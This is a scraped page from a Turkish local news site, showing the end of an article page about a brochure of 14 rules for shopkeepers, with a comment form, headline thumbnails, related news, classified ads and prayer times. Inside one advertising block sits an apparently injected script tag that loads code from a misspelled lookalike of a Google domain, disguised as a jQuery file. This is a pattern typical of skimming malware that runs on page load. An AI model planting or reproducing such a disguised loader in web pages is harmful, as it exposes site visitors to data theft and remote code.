Esnaflara 14 Kural Broşürü Dağıttı</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(67760);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="67760" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="07e7c64077fc934d459638d47cedc31e3b0941b7" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-09-15//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/sehitler-ve-gaziler-derneginden-mhpye-hayirli-olsun-ziyareti-h67761.html" title="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/sehitler_ve_gaziler_derneginden_mhpye_hayirli_olsun_ziyareti_h67761_366b5.jpg" alt="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti" /> <span>Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/salginin-elbistandaki-durumu-masaya-yatirildi-h67759.html" title="Salgının Elbistan’daki durumu masaya yatırıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/salginin_elbistandaki_durumu_masaya_yatirildi_h67759_2c00a.jpg" alt="Salgının Elbistan’daki durumu masaya yatırıldı" /> <span>Salgının Elbistan’daki durumu masaya yatırıldı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html" title="Ne canımız yansın ne de cebimiz!"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/ne_canimiz_yansin_ne_de_cebimiz_h67758_85f3a.jpg" alt="Ne canımız yansın ne de cebimiz!" /> <span>Ne canımız yansın ne de cebimiz!</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/papatyam-anaokuluna-tseden-onayli-okulum-temiz-belgesi-h67757.html" title="Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/papatyam_anaokuluna_tseden_onayli_okulum_temiz_belgesi_h67757_ff454.jpg" alt="Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi" /> <span>Papatyam Anaokulu’na TSE’den onaylı ‘Okulum...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/emyoda-3d-yazici-ile-uretilen-siperlikler-teslim-edildi-h67756.html" title="EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/emyoda_3d_yazici_ile_uretilen_siperlikler_teslim_edildi_h67756_68ceb.jpg" alt="EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi" /> <span>EMYO’da 3D yazıcı ile üretilen siperlikler teslim...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/doga-ve-hayvanlari-koruma-polisinden-yarali-sahine-yardim-eli-h67755.html" title="Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/doga_ve_hayvanlari_koruma_polisinden_yarali_sahine_yardim_eli_h67755_2b366.jpg" alt="Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli" /> <span>Doğa ve Hayvanları Koruma Polisi’nden yaralı...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-keske-yapmasaydim-dememek-icin-tedbiri-elden-birakmayin-h67749.html" title="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/kaymakam_demir_keske_yapmasaydim_dememek_icin_tedbiri_elden_birakmayin_h67749_af449.jpg" alt="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”" /> <span>Kaymakam Demir: “’Keşke yapmasaydım’ dememek...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html" title="Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/elbistan_belediyesi_kedi_parki_projesini_hayata_gecirdi_h67748_ba423.jpg" alt="Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi" /> <span>Elbistan Belediyesi, ‘kedi parkı’ projesini hayata...</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-personel-13083.html" title="Bay personel" >Bay personel</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-personel-13083.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bay personel" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-sekreter-alinacaktir-13082.html" title="BAYAN SEKRETER ALINACAKTIR." >BAYAN SEKRETER ALINACAKTIR.</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-sekreter-alinacaktir-13082.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="BAYAN SEKRETER ALINACAKTIR." class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/hizmetli-temizlik-gorevlisi-araniyor-13081.html" title="HİZMETLİ-TEMİZLİK GÖREVLİSİ ARANIYOR" >HİZMETLİ-TEMİZLİK GÖREVLİSİ ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/hizmetli-temizlik-gorevlisi-araniyor-13081.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/db34fa5a93101cab9f02a075cdec2fc4ba042108.jpg" alt="HİZMETLİ-TEMİZLİK GÖREVLİSİ ARANIYOR" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-bina-komple-veya-daireler-31-140m2-net-13066.html" title="Satılık bina komple veya Daireler 3+1 140m2 net" >Satılık bina komple veya Daireler 3+1 140m2 net</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-bina-komple-veya-daireler-31-140m2-net-13066.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/568a9a6770628b875561ad5eb60e0740efc6870c.jpg" alt="Satılık bina komple veya Daireler 3+1 140m2 net" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13065.html" title="BAYAN ELEMAN" >BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13065.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-21-dogal-gazli-daire-13062.html" title="Satılık 2+1 .dogal gazlı daire" >Satılık 2+1 .dogal gazlı daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-21-dogal-gazli-daire-13062.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/418ac111d0b563a755fa49b9d20902ed2c4c9a52.jpg" alt="Satılık 2+1 .dogal gazlı daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satis-ve-pazarlama-elemani-13058.html" title="SATIŞ VE PAZARLAMA ELEMANI" >SATIŞ VE PAZARLAMA ELEMANI</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satis-ve-pazarlama-elemani-13058.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/abddb12222e4f842263952a649abfe0ea54107db.jpg" alt="SATIŞ VE PAZARLAMA ELEMANI" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-bayan-eleman-13056.html" title="BAY-BAYAN ELEMAN" >BAY-BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-bayan-eleman-13056.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/f60e4a1e29b7f5105d6eb41312e1b95213b83593.jpg" alt="BAY-BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13052.html" title="SATILIK TARLA" >SATILIK TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13052.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK TARLA" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13046.html" title="kiralık daire" >kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13046.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-bayan-eleman-13045.html" title="Kahve deposu bayan eleman" >Kahve deposu bayan eleman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-bayan-eleman-13045.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kahve deposu bayan eleman" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13043.html" title="Bayan eleman" >Bayan eleman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13043.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bayan eleman" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesinde-satlik-daire-13042.html" title="Yesilyurt mahallesinde satlik daire" >Yesilyurt mahallesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesinde-satlik-daire-13042.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Yesilyurt mahallesinde satlik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesinde-satlik-daire-13041.html" title="Yesilyurt mahallesinde satlik daire" >Yesilyurt mahallesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesinde-satlik-daire-13041.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Yesilyurt mahallesinde satlik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesinde-satlik-daire-13040.html" title="Osmanli caddesinde satlik daire" >Osmanli caddesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesinde-satlik-daire-13040.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Osmanli caddesinde satlik daire" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes">39.5B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers">96</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>04:46</td> <td>06:07</td> <td>12:33</td> <td>16:03</td> <td>18:48</td> <td>20:04</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/180-yil-sonra-geri-donduler-drone-gps-ve-ciple-24-saat-korunuyorlar-h67517.html" title="180 yıl sonra geri döndüler, drone,..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/180_yil_sonra_geri_donduler_drone_gps_ve_ciple_24_saat_korunuyorlar_h67517_082a9.jpg" alt="180 yıl sonra geri döndüler, drone,..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/180-yil-sonra-geri-donduler-drone-gps-ve-ciple-24-saat-korunuyorlar-h67517.html" title="" ><span class="en-hit">1.</span> <strong>180 yıl sonra geri döndüler, drone,...</strong> <span class="en-spot en-hidden">Güzel gözlerinden dolayı halk arasında &quot;ceren&quot; olarak adlandırılan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/pompali-tufekli-saldiri-1-i-agir-2-yarali-h67445.html" title="Pompalı tüfekli 